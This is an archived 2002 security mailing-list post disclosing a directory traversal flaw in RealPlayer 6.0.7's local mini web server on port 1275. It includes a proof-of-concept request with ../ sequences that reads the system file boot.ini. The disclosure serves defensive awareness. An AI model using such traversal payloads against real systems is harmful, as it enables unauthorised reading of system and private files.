|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: §ome (exe
FlashMail.com)Date: Sat Mar 02 2002 - 12:16:53 CST
hi
open RealPlayer, go to --> File ---> Open File.. ---> Select any real media
file.. ex: c:\music\file.ram
Play the file.
Now go to ---> View ---> Clip Source
realplayer will open the url
http://127.0.0.1:1275/template.html?src=file://C:/music/file.ram
from now realplay.exe will listen on port 1275 TCP
as you can see, real player have a (Mini WebServer) that listen on port 1275
I only tested the ../../ bug
GET http://127.0.0.1:1275/../../../../../boot.ini
Result: my boot.ini
Vulnerable version: 6.0.7
other version? maybe..
C:\>fport |grep real
Pid Process Port Proto Path
1964 realplay -> 1275 TCP C:\Program
Files\Real\RealPlayer\realplay.exe
§ome1
exeflashmail.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]